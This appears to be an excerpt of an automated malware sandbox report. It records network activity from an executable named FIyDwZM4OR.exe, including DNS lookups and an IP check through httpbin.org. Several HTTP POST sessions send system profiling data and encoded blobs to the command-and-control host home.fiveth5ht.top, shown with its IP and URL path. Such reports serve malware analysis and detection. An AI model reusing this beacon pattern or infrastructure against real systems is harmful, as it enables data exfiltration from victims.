                                                            Dec 28, 2024 10:00:21.429510117 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429543972 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429588079 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429599047 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429629087 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429641008 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429738045 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429779053 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429847002 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429857016 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429965973 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429976940 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430072069 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430082083 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430169106 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430179119 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430248976 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430413961 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430429935 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430444956 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430465937 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430474997 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430521011 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430530071 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430577993 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430599928 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430691957 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430701017 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430763960 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430779934 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430850029 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430872917 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.483455896 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.483628035 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.483788967 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.483951092 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.498318911 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.498334885 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541673899 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541686058 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541832924 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541841984 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541944981 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541997910 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.542009115 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544719934 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544729948 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544847965 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544883013 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544936895 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544976950 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545057058 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545067072 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545113087 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545157909 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545197964 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545260906 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545432091 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545440912 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545461893 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545509100 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545555115 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545600891 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545680046 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545689106 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545721054 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545752048 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545820951 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545914888 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545923948 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545933962 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548600912 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548612118 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548706055 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548716068 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548774004 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548820019 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548950911 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548979044 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549060106 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549124956 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549206972 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549263954 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549273968 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549309969 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549380064 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549432039 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549540997 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549550056 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549642086 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549659967 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549761057 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549770117 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549824953 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549834967 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549927950 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549937010 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549977064 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.550055981 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.603373051 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.603471994 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:22.185810089 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:22.305357933 CET804973281.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:22.305428982 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:22.305883884 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:22.425297976 CET804973281.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:23.574021101 CET804973281.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:23.574315071 CET804973281.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:23.574395895 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:23.574553013 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:23.694024086 CET804973281.29.149.125192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 10:00:15.160046101 CET | 54405 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 10:00:15.160116911 CET | 54405 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 10:00:15.302299023 CET | 53 | 54405 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 10:00:15.302319050 CET | 53 | 54405 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 10:00:19.592344046 CET | 54408 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 10:00:19.592466116 CET | 54408 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 10:00:19.734144926 CET | 53 | 54408 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 10:00:20.001030922 CET | 53 | 54408 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 10:00:22.043572903 CET | 54410 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 10:00:22.043641090 CET | 54410 | 53 | 192.168.2.4 | 1.1.1.1
Dec 28, 2024 10:00:22.184119940 CET | 53 | 54410 | 1.1.1.1 | 192.168.2.4
Dec 28, 2024 10:00:22.184927940 CET | 53 | 54410 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 10:00:15.160046101 CET | 192.168.2.4 | 1.1.1.1 | 0xd31d | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:00:15.160116911 CET | 192.168.2.4 | 1.1.1.1 | 0xf4be | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 28, 2024 10:00:19.592344046 CET | 192.168.2.4 | 1.1.1.1 | 0x99c8 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:00:19.592466116 CET | 192.168.2.4 | 1.1.1.1 | 0xbb2a | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 28, 2024 10:00:22.043572903 CET | 192.168.2.4 | 1.1.1.1 | 0x7446 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:00:22.043641090 CET | 192.168.2.4 | 1.1.1.1 | 0x5a86 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 10:00:15.302299023 CET | 1.1.1.1 | 192.168.2.4 | 0xd31d | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:00:15.302299023 CET | 1.1.1.1 | 192.168.2.4 | 0xd31d | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:00:19.734144926 CET | 1.1.1.1 | 192.168.2.4 | 0x99c8 | No error (0) | home.fiveth5ht.top | | 81.29.149.125 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:00:22.184119940 CET | 1.1.1.1 | 192.168.2.4 | 0x7446 | No error (0) | home.fiveth5ht.top | | 81.29.149.125 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 10:00:33.446007967 CET | 1.1.1.1 | 192.168.2.4 | 0xeb06 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 28, 2024 10:00:33.446007967 CET | 1.1.1.1 | 192.168.2.4 | 0xeb06 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
• httpbin.org
• home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 81.29.149.125 | 80 | 6908 | C:\Users\user\Desktop\FIyDwZM4OR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 10:00:20.122982979 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 561676
Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 35 30 32 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317205024", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 10:00:20.242842913 CET | 12360 | OUT | Data Raw: 34 48 55 56 5c 2f 59 7a 5c 2f 41 4d 4f 72 76 32 43 5c 2f 2b 69 45 44 5c 2f 77 41 4f 64 38 5a 50 5c 2f 6e 68 30 66 38 4f 72 76 32 43 5c 2f 2b 69 45 44 5c 2f 77 41 4f 64 38 5a 50 5c 2f 6e 68 31 5c 2f 4e 48 5c 2f 41 42 50 6a 77 6e 5c 2f 30 51 50 45
Data Ascii: 4HUV\/Yz\/AMOrv2C\/+iED\/wAOd8ZP\/nh0f8Orv2C\/+iED\/wAOd8ZP\/nh1\/NH\/ABPjwn\/0QPEX\/hzy3\/5D1\/p6f1z\/AMU2uNv+jlcLf+GjNv8A5P1\/p6fxzVHJ2\/H+lfpf+1f+wZ4h+HHhTxH8e\/hbpk2pfCCH4ufHfwbrGg2Zvr6++GFh8P8A46\/EP4c+GDdz3tzf6lqnhq60Tw1pUT+Ib27uLu11V5Id
Dec 28, 2024 10:00:20.242896080 CET | 7416 | OUT | Data Raw: 5c 2f 30 4e 50 70 47 42 62 38 38 30 48 51 51 66 78 62 65 5c 2f 36 64 63 56 46 73 50 74 5c 2f 6e 38 4b 6c 66 5c 2f 57 48 5c 2f 41 48 52 5c 2f 53 69 67 43 76 55 66 6c 2b 5c 2f 36 66 5c 2f 58 71 79 5c 2f 54 38 66 36 47 6f 71 44 71 70 64 50 38 50 2b
Data Ascii: \/0NPpGBb880HQQfxbe\/6dcVFsPt\/n8Klf\/WH\/AHR\/SigCvUfl+\/6f\/Xqy\/T8f6GoqDqpdP8P+RVf7p\/D+YqFvlznt6Vc8v3\/T\/wCvUdBsV6Y\/T8f6GnsvYj\/PqKjk7fj\/AEoOgjqPy\/f9P\/r1JRQaw2+f6Iqsu78Kh\/8AQP8AP4dP84q55fv+n\/16rNH7fJ\/ID\/PGM+9B0+\/\/AHfxIZFx9\/8A5a
Dec 28, 2024 10:00:20.242973089 CET | 2472 | OUT | Data Raw: 2b 4b 65 47 77 72 78 53 6a 37 58 45 56 4d 54 4b 6e 43 76 47 6c 4b 6e 5c 2f 4c 68 5c 2f 77 41 45 59 42 41 76 5c 2f 42 54 6a 39 6e 46 62 57 53 57 61 32 57 58 34 7a 69 33 6d 6e 68 53 32 6e 6c 67 48 77 45 2b 4b 77 68 6b 6d 74 34 35 37 71 4f 43 56 34
Data Ascii: +KeGwrxSj7XEVMTKnCvGlKn\/Lh\/wAEYBAv\/BTj9nFbWSWa2WX4zi3mnhS2nlgHwE+Kwhkmt457qOCV49rSQpdXKROSizzKokb+pLQ\/2Uf+Cl1hoHxC0\/Wv+Csf9va54j8I2Gj+AvEP\/DCXwC0v\/hW\/iq38feCPEN74y\/sm08RvZ+MP7Q8DaF4z+Hf\/AAj2svBptp\/wnn\/CWwytrHhfSoJvV\/gf\/wAEy\/2Hv2
Dec 28, 2024 10:00:20.242984056 CET | 2472 | OUT | Data Raw: 38 52 2b 56 4e 71 78 54 48 36 66 6a 5c 2f 51 30 47 6c 50 72 38 76 31 4b 33 6c 2b 5c 2f 36 66 5c 2f 58 71 4f 72 46 46 42 6f 55 70 46 5c 2f 6a 39 50 38 4f 31 4d 71 31 4c 33 5c 2f 33 66 38 61 67 32 48 32 5c 2f 7a 2b 46 42 30 45 50 64 5c 2f 6f 50 35
Data Ascii: 8R+VNqxTH6fj\/Q0GlPr8v1K3l+\/6f\/XqOrFFBoUpF\/j9P8O1Mq1L3\/3f8ag2H2\/z+FB0EPd\/oP5VFViq9aez8\/w\/4JtTqfP9f+D\/AMHQKj8v3\/T\/AOvUlRj\/AJafj\/Wszo9\/+7+JDIuPw\/kf8\/zqGrFQv94\/h\/IUGvO\/L+vmV2Xbjvmm1YqJ+v4f1NBqMqCSP5eufw\/z16VPRQdBSkj+Xjj69\/8AP
Dec 28, 2024 10:00:20.363053083 CET | 7416 | OUT | Data Raw: 39 75 50 4b 6a 5c 2f 41 4e 66 5c 2f 41 4d 75 76 36 38 39 4f 4b 7a 41 50 37 5c 2f 38 41 31 79 38 33 4d 6e 35 65 5c 2f 77 44 58 31 39 61 5a 5c 2f 77 41 44 6a 54 5c 2f 6c 72 39 6f 39 65 5c 2f 74 36 66 35 7a 79 2b 50 5a 35 6d 64 2b 79 50 6a 5c 2f 70
Data Ascii: 9uPKj\/ANf\/AMuv689OKzAP7\/8A1y83Mn5e\/wDX19aZ\/wADjT\/lr9o9e\/t6f5zy+PZ5md+yPj\/pvTPvfx7H80xf6r\/Xf5\/XPvyHQMk3\/JseN\/3v\/PX8vw6dKZ91k\/j\/ANiT8u1PbY8c2\/zE8z\/thj\/P\/wBfIp8f7z1R\/wDllHJFj\/P4+9AFOT+8n18r8zj+XT8u9SeYgk\/1PkzT\/vc\/67jr\/omM
Dec 28, 2024 10:00:20.363116980 CET | 2472 | OUT | Data Raw: 72 34 31 38 43 5c 2f 44 44 52 76 6a 4c 2b 7a 37 34 6f 2b 4b 6e 6a 50 34 76 2b 41 50 67 6a 71 50 77 36 38 50 38 41 6a 6e 78 31 71 47 71 65 42 66 47 33 78 41 38 54 36 64 34 4d 74 34 5c 2f 45 48 6a 43 4c 34 55 48 34 53 65 4c 62 4c 77 31 34 6d 31 57
Data Ascii: r418C\/DDRvjL+z74o+KnjP4v+APgjqPw68P8Ajnx1qGqeBfG3xA8T6d4Mt4\/EHjCL4UH4SeLbLw14m1Wy03xW3wX+JHxXv7ENd3+nWGrabpWr3lh8dLwR+iQvq\/LxHj67xNKlXoxwvEOPxk3hq2Ey3HQxU4YXA1p0sIsJm+VVquLqxp4egsywUa1WnPE0Yy\/QY\/SE+m45YmNThfLcN9Uq18PWnjuGcrwFJYrD4vMcDUwdO
Dec 28, 2024 10:00:20.363193035 CET | 2472 | OUT | Data Raw: 73 74 65 57 63 53 63 55 5a 70 6d 33 45 65 5a 59 64 76 42 78 6b 73 77 7a 50 4d 38 56 69 4d 7a 6a 56 77 6d 44 72 31 76 37 4e 72 55 73 77 6e 69 4b 56 62 4c 63 53 71 4f 4b 77 55 34 75 68 57 6f 55 35 51 73 4e 66 37 70 5c 2f 44 2b 59 71 47 72 46 52 50
Data Ascii: steWcScUZpm3EeZYdvBxkswzPM8ViMzjVwmDr1v7NrUswniKVbLcSqOKwU4uhWoU5QsNf7p\/D+YqGrFRP1\/D+pr7Y+IGUUUUAQv8AeP4fyFNp79fw\/qaZQdBGY\/T8Qf8AP6YqF\/un8P5irVQv94\/h\/IUAVaKmf7p\/D+Ypm35c9+v4f55\/Sug6BlQv94\/h\/IVNRQBXop+w+3+fwppUr\/8AWoOgSq9WKhPV\/wAf\
Dec 28, 2024 10:00:20.363228083 CET | 2472 | OUT | Data Raw: 48 39 39 41 6e 5c 2f 41 45 79 5c 2f 64 79 5c 2f 75 4b 6d 38 76 35 70 6e 38 6b 76 35 66 31 38 6a 2b 66 4e 4d 2b 58 6a 35 42 4e 2b 36 38 32 57 50 7a 66 7a 36 5c 2f 57 67 76 6e 66 6c 5c 2f 58 7a 47 62 6b 6a 56 30 2b 2b 5c 2f 6c 66 75 6f 34 5c 2f 31
Data Ascii: H99An\/AEy\/dy\/uKm8v5pn8kv5f18j+fNM+Xj5BN+682WPzfz6\/Wgvnfl\/XzGbkjV0++\/lfuo4\/1\/pVbbIi79nz\/wDTP9x\/nt3OKmk2SN5P8Zi\/z\/k9KGZP3L7I08uL97\/x9e\/+f\/1UGoSR\/K7xw\/J\/rfLk\/wBf9n\/5dBn8x+VQv8uzZ\/y0\/dS9ef8Ap6+vp\/hR8hX7myHyvKikjl\/1P+l8\/wCc
Dec 28, 2024 10:00:20.406461000 CET | 27192 | OUT | Data Raw: 58 78 6f 73 76 32 2b 4e 43 2b 49 66 78 56 38 59 65 4e 50 69 39 34 30 38 64 65 41 76 69 39 38 4c 62 4c 34 4c 2b 49 62 33 39 6a 54 78 5c 2f 72 46 39 34 41 31 37 77 44 6f 50 68 56 57 5c 2f 32 6f 66 41 6d 69 66 45 58 34 56 2b 4c 50 68 33 42 59 32 75
                                                            Data Ascii: Xxosv2+NC+IfxV8YeNPi9408deAvi98LbL4L+Ib39jTx\/rF94A17wDoPhXW\/2ofAmifEX4V+LPh3BY2usSeEdP8ABtzpHrs\/h3w\/dSNNc6Fo9xM33pZ9MspZG\/3nkgZj+Jo\/4R7QA6SDQ9HEkZzG\/wDZllvjJ6lG8jcpOBypB4r1av0Qcor5plOYVeMc55MpzHMcfCnSp4WlXxX9pZhTx1bD4rGewnXr0aapxo0\/rcs
                                                            Dec 28, 2024 10:00:20.526231050 CET7416OUTData Raw: 38 4f 76 42 37 5c 2f 41 4c 4c 66 50 56 5c 2f 35 67 61 66 5c 2f 41 41 4e 66 49 38 64 6f 6f 6f 72 5c 2f 41 4b 4a 6a 5c 2f 41 77 4b 62 4c 33 5c 2f 41 4e 37 5c 2f 41 42 70 31 46 41 46 65 76 36 4a 5c 2f 2b 43 48 62 34 38 45 5c 2f 74 44 44 30 38 55 5c
                                                            Data Ascii: 8OvB7\/ALLfPV\/5gaf\/AANfI8dooor\/AKJj\/AwKbL3\/AN7\/ABp1FAFev6J\/+CHb48E\/tDD08U\/D04\/3tJ8VD\/2Wv53PL9\/0\/wDr1+\/X\/BHDxXo3gH4Q\/tY+NfEdz9j8PeDG8KeLNeugm5rXRvD\/AIY8datqlwqFkVjDY2U8oVnQMVALKCTX8sfTFo1cR4MYqhRpyq1q3E3DlKlShFynUqVMVUhCnCMU3KU
                                                            Dec 28, 2024 10:00:21.483455896 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 81.29.149.125 | 80 | 6908 | C:\Users\user\Desktop\FIyDwZM4OR.exe

Timestamp | Bytes transferred | Direction | Data
Dec 28, 2024 10:00:22.305883884 CET | 284 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
Host: home.fiveth5ht.top
Accept: */*
Content-Type: application/json
Content-Length: 143
Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 28, 2024 10:00:23.574021101 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 3.218.7.103 | 443 | 6908 | C:\Users\user\Desktop\FIyDwZM4OR.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 09:00:17 UTC | 52 | OUT | GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2024-12-28 09:00:17 UTC | 224 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 09:00:17 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2024-12-28 09:00:17 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
Data Ascii: { "origin": "8.46.123.189"}



Target ID: 0
Start time: 04:00:11
Start date: 28/12/2024
Path: C:\Users\user\Desktop\FIyDwZM4OR.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\FIyDwZM4OR.exe"
Imagebase: 0xe90000
File size: 4'464'128 bytes
